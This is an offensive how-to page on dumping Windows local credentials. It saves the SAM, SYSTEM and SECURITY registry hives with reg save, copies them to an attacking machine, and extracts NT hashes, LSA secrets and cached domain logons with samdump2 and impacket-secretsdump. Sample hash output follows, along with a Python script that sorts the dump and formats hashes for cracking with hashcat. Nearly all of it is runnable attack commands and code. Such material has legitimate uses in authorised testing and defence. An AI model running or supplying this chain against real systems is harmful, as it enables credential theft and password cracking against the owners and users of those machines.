Registry Dump

Below we show how to dump local credentials from the registry: save the SAM, SYSTEM and SECURITY hives with reg save, copy the files off the host, and extract the hashes offline. The commands need an elevated (administrator) prompt, because the SAM and SECURITY keys are not readable by normal users. The SYSTEM hive is required because it holds the boot key that protects the SAM; the SECURITY hive additionally yields LSA secrets and cached domain logons.


Registry Dump

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security

After copying the three hive files to the attacking machine, extract the hashes with either of the following commands. samdump2 takes the SYSTEM hive first and the SAM second; secretsdump with the LOCAL target parses the files offline and, when the SECURITY hive is supplied, also prints LSA secrets and cached credentials:

samdump2 system sam
impacket-secretsdump -sam sam -security security -system system LOCAL

Below is example samdump2 output. samdump2 prefixes disabled accounts with *disabled*; the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password, and the LM value aad3b435b51404eeaad3b435b51404ee means no LM hash is stored. If every account shows the empty NT hash on a modern host, cross-check with secretsdump before trusting the result: older samdump2 releases cannot decrypt the AES-protected SAM format introduced with Windows 10 1607 and report every hash as empty.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
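Both tools emit the same pwdump format (user:rid:lmhash:nthash:::), so a small parser lets you triage a dump before spending GPU time. The following is an added example, not code from the original page or from samdump2/impacket: it parses the output above, flags disabled accounts and empty-password hashes, and builds the user:nthash lines for hashcat -m 1000 with --username. The svc_backup line in the sample is constructed (its NT hash is that of "password") so that one account survives triage.

```python
import re
from dataclasses import dataclass
from typing import List

# Well-known marker values in pwdump output.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# samdump2 / secretsdump line: [*disabled* ]user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(
    r"^(?P<flag>\*disabled\*\s+)?"
    r"(?P<user>[^:]*):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Lines 1-5 are the page's own samdump2 output; the svc_backup line is constructed.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1004:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str
    disabled: bool

    @property
    def empty_password(self) -> bool:
        return self.nt == EMPTY_NT

    @property
    def has_lm(self) -> bool:
        # A real LM hash means the password is at most 14 chars and trivially crackable.
        return self.lm != EMPTY_LM


def parse_pwdump(text: str) -> List[SamEntry]:
    """Parse pwdump-format lines; banners such as secretsdump's '[*] ...' lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        m = PWDUMP_RE.match(line)
        if not m:
            continue
        entries.append(
            SamEntry(
                user=m["user"],
                rid=int(m["rid"]),
                lm=m["lm"].lower(),
                nt=m["nt"].lower(),
                disabled=bool(m["flag"]),
            )
        )
    return entries


def crack_candidates(entries: List[SamEntry]) -> List[SamEntry]:
    """Enabled accounts whose NT hash is not the empty-password value."""
    return [e for e in entries if not e.disabled and not e.empty_password]


def hashcat_nt_lines(entries: List[SamEntry]) -> List[str]:
    """user:nthash lines for `hashcat -m 1000 --username`; unnamed accounts get a RID label."""
    return [f"{e.user or 'RID' + str(e.rid)}:{e.nt}" for e in crack_candidates(entries)]


def all_empty(entries: List[SamEntry]) -> bool:
    """True when every account reports the empty NT hash: re-run with secretsdump before trusting it."""
    return bool(entries) and all(e.empty_password for e in entries)


if __name__ == "__main__":
    parsed = parse_pwdump(SAMPLE_DUMP)
    for e in parsed:
        state = "disabled" if e.disabled else "enabled"
        print(f"{e.user or '<no name>':>14} rid={e.rid:<5} {state:<8} empty_pw={e.empty_password}")
    print("hashcat input:", hashcat_nt_lines(parsed))
```

Run secretsdump's output through the same function unchanged: its SAM section uses the same line format, and the bootKey and LSA-secret lines simply fail the regex and are ignored.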
